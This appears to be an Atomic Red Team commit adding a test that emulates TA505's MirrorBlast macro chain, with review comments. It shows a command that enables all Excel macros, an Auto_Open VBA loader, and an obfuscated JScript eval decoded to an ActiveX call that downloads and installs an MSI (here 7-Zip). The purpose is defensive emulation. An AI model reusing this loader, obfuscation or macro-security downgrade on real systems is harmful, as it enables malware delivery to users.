T1204.002 Added Test to Emulate Mirror Blast TA505 (#2180)

* Update T1204.002.yaml

Added Mirror Blast technique.

* Update T1204.002.yaml

Added cleanup command to Mirror Blast Test.

* Add files via upload

Added Excel sheet with macro to download 7zip.

* Add files via upload

Information about macro in Mirror Blast.

* use PathToAtomicsFolder

* add link to blog

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
CDub1016
2022-10-12 14:53:10 -05:00
committed by GitHub
parent cc0f4485ca
commit 3bff37d737
3 changed files with 26 additions and 0 deletions
+14
@@ -408,3 +408,17 @@ atomic_tests:
Remove-Item $file1 -ErrorAction Ignore
Remove-Item $file2 -ErrorAction Ignore
name: powershell
- name: Mirror Blast Emulation
description: |
Emulates the JS -> MSI chain of the MirrorBlast T505 campaign by executing an xlsm file designed.
Requires the 32 bit version of Office to run. [MirrorBlast Campaign Analysis](https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies)
supported_platforms:
- windows
executor:
command: |-
Cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
New-ItemProperty -Path Registry::HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Security -Name "VBAWarnings" -Value "1" -PropertyType DWORD -Force | Out-Null
& '.\Excel 2016.lnk' PathToAtomicsFolder\T1204.002\bin\mirrorblast_emulation.xlsm
cleanup_command: reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security" /v "VBAWarnings" /f
name: powershell
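Review bot: the `cleanup_command` deletes the HKCU `VBAWarnings` value outright, so a host that had the value set before the test (for example to 2 or 3 by policy) is left with it removed rather than restored; consider capturing the existing value in the executor (e.g. exporting the key with `reg export` to a temp file) and restoring it in cleanup, and note in the description that `-Value "1"` enables all macros for the whole test window. The description also has two text defects: "T505" should be "TA505" (as in the commit title), and "an xlsm file designed." ends mid-sentence. Finally, the test depends on `.\Excel 2016.lnk` existing under the Start Menu and on 32-bit Office, but declares no `dependencies` block with a `prereq_command`, so on a host without that shortcut it fails with an unclear error; launching `excel.exe` directly, or checking for the shortcut in a prereq, would be more robust.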
Binary file not shown.
+12
@@ -0,0 +1,12 @@
The file that was added to binary is the excel spreadsheet that has the macro to download 7zip.
VBA code (in auto_open excel module)
Sub Auto_Open() With CreateObject("ScriptControl") .Language = "JScript" .AddCode (Range("A1").Value) End With EndSub
---------------------
Encoded JS Command:
eval('}kk)kk"kkikkskkmkk.kk4kk6kkxkk-kk7kk0kk1kk2kkzkk7kk/kkakk/kkgkkrkkokk.kkpkkikkzkk-kk7kk.kkwkkwkkwkk/kk/kk:kkskkpkktkktkkhkk"kk(kktkkckkukkdkkokkrkkPkklkklkkakktkkskknkkIkk;kk1kk=kklkkekkvkkekkLkkIkkUkk{kk)kk)kk"kkrkkekklkklkkakktkkskknkkIkk.kkrkkekklkklkkakktkkskknkkIkkskkwkkokkdkknkkikkWkk"kk(kktkkckkekkjkkbkkOkkXkkekkvkkikktkkckkAkk kkwkkekknkk(kkhkktkkikkw'.split('kk').reverse().join(''))
--------------------
Decoded JS Command:
with(new ActiveXObject("WindowsInstaller.Installer")){UILevel=1;InstallProduct("https://www.7-zip.org/a/7z2107-x64.msi")}
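Review bot: the VBA listing is run together on one line and `EndSub` is not valid VBA (`End Sub`), so someone reproducing the macro from this readme cannot copy it as written; put each statement on its own line. The readme should also state why 32-bit Office is required: `CreateObject("ScriptControl")` uses the MSScriptControl COM component, which only exists as a 32-bit build, so the macro fails on 64-bit Office. Lastly, the decoded command installs 7-Zip from the live 7-zip.org URL, so the test needs internet access and leaves 7-Zip installed; the YAML cleanup only removes the registry value, so either document that or add an uninstall step.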